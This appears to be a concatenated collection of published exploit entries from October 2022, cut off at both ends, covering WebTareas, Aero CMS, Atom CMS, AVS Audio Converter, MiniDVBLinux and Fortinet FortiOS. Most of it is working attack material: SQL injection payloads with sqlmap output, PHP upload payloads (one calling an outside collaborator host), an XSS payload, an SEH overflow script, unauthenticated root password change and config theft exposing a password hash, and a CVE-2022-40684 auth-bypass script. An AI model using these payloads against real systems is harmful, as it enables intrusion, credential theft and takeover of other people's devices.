Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 302 Found
Date: Sat, 15 Oct 2022 11:38:39 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ../service_site/home.php?msg=permissiondenied
Content-Length: 355
Connection: close
Content-Type: text/html; charset=UTF-8
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br />
<b>Warning</b>: Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br />
-----------------------------------------------------------------------------------------------------------------------
SQLMap:
-----------------------------------------------------------------------------------------------------------------------
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
[11:49:03] [INFO] testing MySQL
[11:49:03] [INFO] confirming MySQL
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
[11:49:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.30, Apache 2.4.54
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[11:49:03] [INFO] fetching database names
[11:49:04] [INFO] starting 6 threads
[11:49:06] [INFO] retrieved: 'zxcv'
[11:49:06] [INFO] retrieved: 'information_schema'
[11:49:06] [INFO] retrieved: 'performance_schema'
[11:49:06] [INFO] retrieved: 'test'
[11:49:06] [INFO] retrieved: 'phpmyadmin'
[11:49:06] [INFO] retrieved: 'mysql'
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] zxcv
[11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1'
[11:49:06] [WARNING] your sqlmap version is outdated
[*] ending @ 11:49:06 /2022-10-15/
# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 0.0.1
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example
-----------------------------------------------------------------------------------------------------------------------
Param: image content uploading image
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116
Content-Length: 1156
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_title"
mmmmmmmmmmmmmmmmm
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_category_id"
1
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_user"
admin
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_status"
draft
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"
Content-Type: text/plain
<?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?>
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_tags"
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_content"
<p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="create_post"
Publish Post
-----------------------------369779619541997471051134453116--
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.
# Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Proof Of Concept
-----------------------------------------------------------------------------------------------------------------------
Param: searchtype
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 07:46:31 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11147
[...]
<form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)">
[...]
-----------------------------------------------------------------------------------------------------------------------
Other vulnerable url and params:
-----------------------------------------------------------------------------------------------------------------------
/webtareas/administration/print_layout.php [doc_type]
/webtareas/general/login.php [logout]
/webtareas/general/login.php [session]
/webtareas/general/newnotifications.php [msg]
/webtareas/general/search.php [searchtype]
/webtareas/administration/print_layout.php [doc_type]
# Exploit Title: Atom CMS v2.0 - SQL Injection (no auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS
# Software Link: https://github.com/thedigicraft/Atom.CMS
# Version: 2.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example
-----------------------------------------------------------------------------------------------------------------------
Param: id
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /Atom.CMS-master/admin/index.php?page=users&id=(select*from(select(sleep(10)))a) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Atom.CMS-master/admin/index.php?page=users&id=1
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
first=Alan2n&last=Quandt&email=alan%40alan.com&status=1&password=&passwordv=&submitted=1&id=1
--------------------------------------------------------------------------------------------------------------------- --
Response wait 10 sec
-----------------------------------------------------------------------------------------------------------------------
Other URL and params
-----------------------------------------------------------------------------------------------------------------------
/Atom.CMS-master/admin/index.php [email]
/Atom.CMS-master/admin/index.php [id]
/Atom.CMS-master/admin/index.php [slug]
/Atom.CMS-master/admin/index.php [status]
/Atom.CMS-master/admin/index.php [user]
# Exploit Title: WebTareas 2.4 - RCE (Authorized)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example in forum -> members forum -> chat
-----------------------------------------------------------------------------------------------------------------------
Param: chatPhotos0
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /webtareas/includes/chattab_serv.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126
Content-Length: 6852
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="action"
sendPhotos
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatTo"
2
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatType"
P
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php"
Content-Type: image/png
PNG
[...]
<?php phpinfo();?>
[...]
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 11:27:41 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 661
Connection: close
Content-Type: application/json
{"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"}
-----------------------------------------------------------------------------------------------------------------------
See link: /files\/Messages\/7.php
-----------------------------------------------------------------------------------------------------------------------
Req:
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/files/Messages/7.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 11:28:16 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89945
[...]
<title>PHP 7.4.30 - phpinfo()</title>
[...]
<h1 class="p">PHP Version 7.4.30</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr>
<tr><td class="e">Build Date </td><td class="v">Jun 7 2022 16:22:15 </td></tr>
<tr><td class="e">Compiler </td><td class="v">Visual C++ 2017
[...]
# Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)
# Discovered by: Yehia Elghaly - Mrvar0x
# Discovered Date: 2022-10-16
# Tested Version: 10.3.1.633
# Tested on OS: Windows 7 Professional x86
#pop+ret Address=005154E6
#Message= 0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
# The only module that has SafeSEH disabled.
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |
# 0x00400000 | 0x01003000 | False | False | False | False | False |
#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.
#Buffer = '\x41'* 260
#nSEH = '\x42'*4
#SEH = '\x43'*4
#ESI = 'D*44' # ESI Overwrite
#buffer = "A"*260 + [nSEH] + [SEH] + "D"*44
#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44
# Rexploit:
# Generate the 'evil.txt' payload using python 2.7.x on Linux.
# Open the file 'evil.txt' Copy.
# Paste at'Output Folder and click 'Browse'.
#!/usr/bin/python -w
filename="evil.txt"
buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Exploit Title: MiniDVBLinux 5.4 - Change Root Password
# Exploit Author: LiquidWorm
MiniDVBLinux 5.4 Change Root Password PoC
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application allows a remote attacker to change the root
password of the system without authentication (disabled by default)
and verification of previously assigned credential. Command execution
also possible using several POST parameters.
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5715
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php
24.09.2022
--
Default root password: mld500
Change system password:
-----------------------
POST /?site=setup§ion=System HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 778
Content-Type: application/x-www-form-urlencoded
Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba
Host: ip:8008
Origin: http://ip:8008
Referer: http://ip:8008/?site=setup§ion=System
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
sec-gpc: 1
APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save¶ms=&changed=SYSTEM_PASSWORD+
Pretty post data:
APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD: r00t
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Kumanovo
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: SYSTEM_PASSWORD
Eenable webif password check:
-----------------------------
POST /?site=setup§ion=System HTTP/1.1
APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
WEBIF_PASSWORD_CHECK: 1
action: save
params:
changed: WEBIF_PASSWORD_CHECK
Disable webif password check:
-----------------------------
POST /?site=setup§ion=System HTTP/1.1
APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: WEBIF_PASSWORD_CHECK
# Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit
# Exploit Author: LiquidWorm
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application is vulnerable to unauthenticated configuration
download when direct object reference is made to the backup function
using an HTTP GET request. This will enable the attacker to disclose
sensitive information and help her in authentication bypass, privilege
escalation and full system access.
====================================================================
/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh:
------------------------------------------------------------
01: <?
02: if [ "$GET_action" = "getconfig" ]; then
03: . /etc/rc.config
04: header "Content-Type: application/x-compressed-tar"
05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"
06: /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null
07: cat /tmp/backup_config_$$.tgz
08: rm -rf /tmp/backup_config*
09: exit
10: fi
11: ?>
12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div>
====================================================================
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5713
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php
24.09.2022
--
> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz
> mkdir configdir
> tar -xvzf config.tgz -C .\configdir
> cd configdir && cd etc
> type passwd
root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh
daemon:!:1:1::/:
ftp:!:40:2:FTP account:/:/bin/sh
user:!:500:500::/home/user:/bin/sh
nobody:!:65534:65534::/tmp:
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
>
# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)
# Date: 13/10/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.fortinet.com/
# Version:
#FortiOS from 7.2.0 to 7.2.1
#FortiOS from 7.0.0 to 7.0.6
#FortiProxy 7.2.0
#FortiProxy from 7.0.0 to 7.0.6
#FortiSwitchManager 7.2.0
#FortiSwitchManager 7.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-40684
# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass
# Usage: ./poc.sh <ip> <port>
# Example: ./poc.sh 10.10.10.120 8443
#!/bin/bash
red="\e[0;31m\033[1m"
blue="\e[0;34m\033[1m"
yellow="\e[0;33m\033[1m"
end="\033[0m\e[0m"
target=$1
port=$2
vuln () {
echo -e "${yellow}[+] Dumping System Information: ${end}"
timeout 10 curl -s -k -X $'GET' \
-H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out
if [ "$?" == "0" ];then
grep "results" ./$target.out >/dev/null
if [ "$?" == "0" ];then
echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}"
else
rm -f ./$target.out
echo -e "${red}Not Vulnerable ${end}"
fi
else
echo -e "${red}Not Vulnerable ${end}"
rm -f ./$target.out
fi
}
vuln
# Exploit Title: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)
# Exploit Author: LiquidWorm
MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application allows the usage of the SVDRP protocol/commands
to be sent by a remote attacker to manipulate and/or control remotely
the TV.
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5714
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php
24.09.2022
--
Send a message to the TV screen:
curl http://ip:8008/?site=commands§ion=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU!
220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8
250 Message queued
221 mld closing connection
For more commands:
- https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands
# Exploit Title: MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure
# Exploit Author: LiquidWorm
MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
